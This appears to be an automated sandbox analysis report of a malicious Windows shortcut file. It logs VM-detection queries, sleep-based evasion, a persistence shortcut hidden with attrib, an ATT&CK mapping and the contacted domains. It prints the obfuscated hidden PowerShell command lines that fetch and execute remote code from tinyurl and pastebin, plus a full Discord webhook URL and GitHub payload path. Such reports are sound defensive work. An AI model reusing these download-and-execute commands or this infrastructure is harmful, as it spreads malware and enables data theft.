Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1313Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2024Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4355Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5466Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 605Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 358Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3364Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6344Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 815
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 685
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6020
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3745
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep count: 1313 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep count: 2024 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep count: 141 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep count: 4355 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep count: 5466 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep time: -16602069666338586s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1704Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080Thread sleep count: 605 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1996Thread sleep count: 138 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep count: 358 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1892Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4228Thread sleep count: 3364 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788Thread sleep time: -23980767295822402s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2952Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2264Thread sleep count: 6344 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep count: 815 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep count: 685 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4672Thread sleep count: 189 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4668Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4276Thread sleep count: 6020 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep count: 3745 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5068Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 0000000F.00000002.2046840089.00000246BBC80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: powershell.exe, 00000004.00000002.1780221585.0000012AE31E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1951884074.000001B43695E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Spearphishing Link		111
Windows Management Instrumentation		11
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping111
Security Software Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		1
DLL Side-Loading		11
Registry Run Keys / Startup Folder		131
Virtualization/Sandbox Evasion		LSASS Memory11
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		11
Process Injection		Security Account Manager131
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeylogging14
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534106 Sample: BeginSync lnk.lnk Startdate: 15/10/2024 Architecture: WINDOWS Score: 96 42 pastebin.com 2->42 44 tinyurl.com 2->44 46 2 other IPs or domains 2->46 64 Suricata IDS alerts for network traffic 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 Windows shortcut file (LNK) starts blacklisted processes 2->68 72 3 other signatures 2->72 9 forfiles.exe 1 2->9         started        12 forfiles.exe 1 2->12         started        14 forfiles.exe 1 2->14         started        signatures3 70 Connects to a pastebin service (likely for C&C) 42->70 process4 signatures5 74 Windows shortcut file (LNK) starts blacklisted processes 9->74 76 Suspicious powershell command line found 9->76 16 powershell.exe 7 9->16         started        19 conhost.exe 1 9->19         started        21 powershell.exe 12->21         started        23 conhost.exe 1 12->23         started        25 powershell.exe 7 14->25         started        27 conhost.exe 1 14->27         started        process6 signatures7 56 Windows shortcut file (LNK) starts blacklisted processes 16->56 58 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 16->58 60 Suspicious powershell command line found 16->60 62 Powershell creates an autostart link 16->62 29 powershell.exe 15 18 16->29         started        34 powershell.exe 21->34         started        36 powershell.exe 13 25->36         started        process8 dnsIp9 48 raw.githubusercontent.com 185.199.111.133, 443, 49703, 49704 FASTLYUS Netherlands 29->48 50 tinyurl.com 104.18.111.161, 49701, 80 CLOUDFLARENETUS United States 29->50 54 2 other IPs or domains 29->54 40 C:\ProgramData\...\BeginSync.lnk, MS 29->40 dropped 78 Tries to open files direct via NTFS file id 29->78 38 attrib.exe 1 29->38         started        52 172.67.19.24, 443, 49716, 49717 CLOUDFLARENETUS United States 34->52 file10 signatures11 process12

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
BeginSync lnk.lnk5%ReversingLabs
BeginSync lnk.lnk100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
tinyurl.com
104.18.111.161
truetrue
    		unknown
    discord.com
    		162.159.137.232
    		truetrue
      		unknown
      raw.githubusercontent.com
      		185.199.111.133
      		truetrue
        		unknown
        pastebin.com
        		104.20.3.235
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://tinyurl.com/yeykydunfalse
            		unknown
            http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
              		unknown
              https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                		unknown
                http://pastebin.com/raw/sA04Mwk2false
                  		unknown
                  https://pastebin.com/raw/sA04Mwk2false
                    		unknown
                    https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2true
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1775607526.0000012ADAF55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://discord.compowershell.exe, 00000004.00000002.1746329088.0000012ACB62B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4C83000.00000004.00000800.00020000.00000000.sdmptrue
                        		unknown
                        https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_powershell.exe, 0000000F.00000002.1991384443.00000246A43A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A43A0000.00000004.00000800.00020000.00000000.sdmptrue
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQpowershell.exe, 00000004.00000002.1746329088.0000012ACC60C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F10E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A43A4000.00000004.00000800.00020000.00000000.sdmptrue
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://go.micropowershell.exe, 00000004.00000002.1746329088.0000012ACB767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A3CDC000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Licensepowershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Iconpowershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://raw.githubusercontpowershell.exe, 00000004.00000002.1746329088.0000012ACC578000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://discord.com/powershell.exe, 00000004.00000002.1746329088.0000012ACB73E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4DB9000.00000004.00000800.00020000.00000000.sdmptrue
                                  		unknown
                                  http://discord.compowershell.exe, 00000004.00000002.1746329088.0000012ACB62B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4C83000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtQpowershell.exe, 00000004.00000002.1746329088.0000012ACB2AE000.00000004.00000800.00020000.00000000.sdmpfalse
